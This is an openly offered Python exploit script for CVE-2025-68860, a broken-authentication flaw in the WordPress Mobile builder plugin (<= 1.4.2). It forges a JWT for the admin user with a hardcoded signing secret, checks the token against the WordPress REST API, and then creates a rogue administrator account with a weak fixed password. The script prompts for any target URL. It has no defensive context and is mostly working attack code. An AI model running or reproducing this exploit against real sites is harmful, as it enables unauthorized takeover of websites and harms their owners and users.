README.md
Rendering markdown...
"""
================================================================================
Exploit Title: WordPress Mobile builder Plugin <= 1.4.2 Broken Authentication
CVE: CVE-2025-68860
Priority: High
Description:
This script completely ignores all previous states, settings, or exploits.
On execution, it generates a valid JWT token for WordPress Mobile builder <= 1.4.2,
authenticates as admin (user_id=1), and uses that token to create a new administrator account.
Vulnerability Reference: CVE-2025-68860
Plugin: WordPress Mobile builder (<= 1.4.2)
Author: Nxploited (Khaled Alenazi)
Telegram: @KNxploited
GitHub: https://github.com/Nxploited
================================================================================
"""
#!/usr/bin/env python3
from __future__ import annotations
import time
import jwt
import requests
import json
from colorama import Fore, Style, init as color_init
color_init(autoreset=True)
BANNER = r'''
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
╚═══════════════════════════════════════════════════════════════════╝
'''
AUTHOR_INFO = [
f"Exploit by : Nxploited (Khaled Alenazi)",
f"Telegram : @KNxploited",
f"GitHub : https://github.com/Nxploited"
]
def print_status(msg: str, level: str = "info") -> None:
colors = {
"info": Fore.CYAN,
"success": Fore.GREEN,
"error": Fore.RED,
"warning": Fore.YELLOW
}
color = colors.get(level, Fore.WHITE)
tag = level.upper()
print(f"[{tag}] {color}{msg}{Style.RESET_ALL}")
def show_banner():
print(Fore.LIGHTYELLOW_EX + BANNER + Style.RESET_ALL)
for line in AUTHOR_INFO:
print(Fore.WHITE + line + Style.RESET_ALL)
print("")
def build_jwt_token(base_url: str, user_id: int = 1, secret: str = "example_key", ttl: int = 3600) -> str:
now = int(time.time())
payload = {
"iss": base_url,
"iat": now,
"nbf": now,
"exp": now + ttl,
"data": {
"user_id": user_id
}
}
token = jwt.encode(payload, secret, algorithm="HS256")
return token
def pretty_json(j):
return json.dumps(j, ensure_ascii=False, indent=2)
def print_admin_credentials(username, password, email):
print()
print(Fore.LIGHTMAGENTA_EX + "==============[ New Admin Credentials ]==============" + Style.RESET_ALL)
print(f"{Fore.CYAN}Username :{Style.RESET_ALL} {Fore.GREEN}{username}{Style.RESET_ALL}")
print(f"{Fore.CYAN}Password :{Style.RESET_ALL} {Fore.YELLOW}{password}{Style.RESET_ALL}")
print(f"{Fore.CYAN}Email :{Style.RESET_ALL} {Fore.MAGENTA}{email}{Style.RESET_ALL}")
print(Fore.LIGHTMAGENTA_EX + "="*51 + Style.RESET_ALL)
print()
def main():
show_banner()
print_status("CVE-2025-68860 // WordPress Mobile builder Broken Authentication", "info")
print_status("All old exploits/settings are ignored, running this vector only.", "info")
url = input(Fore.YELLOW + "Site URL (example: http://target.site): " + Style.RESET_ALL).strip().rstrip("/")
if not url:
print_status("URL is required.", "error")
exit(1)
secret = "example_key"
user_id = 1
# STEP 1: BUILD JWT
print_status("Generating JWT as admin (user_id=1)...", "info")
token = build_jwt_token(url, user_id=user_id, secret=secret)
print(Fore.GREEN + token + Style.RESET_ALL)
print("-"*62)
# STEP 2: VERIFY ADMIN SESSION
print_status("Testing JWT at /wp-json/wp/v2/users/me", "info")
api_me = f"{url}/wp-json/wp/v2/users/me"
headers = {"Authorization": f"Bearer {token}"}
resp = requests.get(api_me, headers=headers, timeout=15, verify=False)
if resp.status_code == 200:
print_status("JWT valid! Confirmed admin access.", "success")
else:
print_status(f"Token/endpoint failed: {resp.status_code} {resp.text[:70]}", "error")
exit(2)
print("-"*62)
print_status("Creating admin account using exploit...", "info")
api_users = f"{url}/wp-json/wp/v2/users"
admin_username = "Nxploited"
admin_password = "admin"
admin_email = "[email protected]"
admin_data = {
"username": admin_username,
"name": admin_username,
"email": admin_email,
"password": admin_password,
"roles": ["administrator"]
}
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
}
resp = requests.post(api_users, headers=headers, json=admin_data, timeout=15, verify=False)
time.sleep(1.2)
print_status("Exploiting, please wait...", "info")
if resp.status_code in (200,201):
print_status("✅ Admin user created successfully!", "success")
print_admin_credentials(admin_username, admin_password, admin_email)
try:
resj = resp.json()
print(Fore.LIGHTGREEN_EX + "Full API response:" + Style.RESET_ALL)
print(pretty_json(resj))
except Exception:
print(Fore.YELLOW + resp.text[:350] + Style.RESET_ALL)
else:
print_status(f"Failed to create admin: [{resp.status_code}] {resp.text[:120]}", "error")
print("-"*62)
print_status("Exploit finished. Enjoy your shell.", "success")
print("")
for line in AUTHOR_INFO: print(Fore.WHITE + line + Style.RESET_ALL)
if __name__ == "__main__":
main()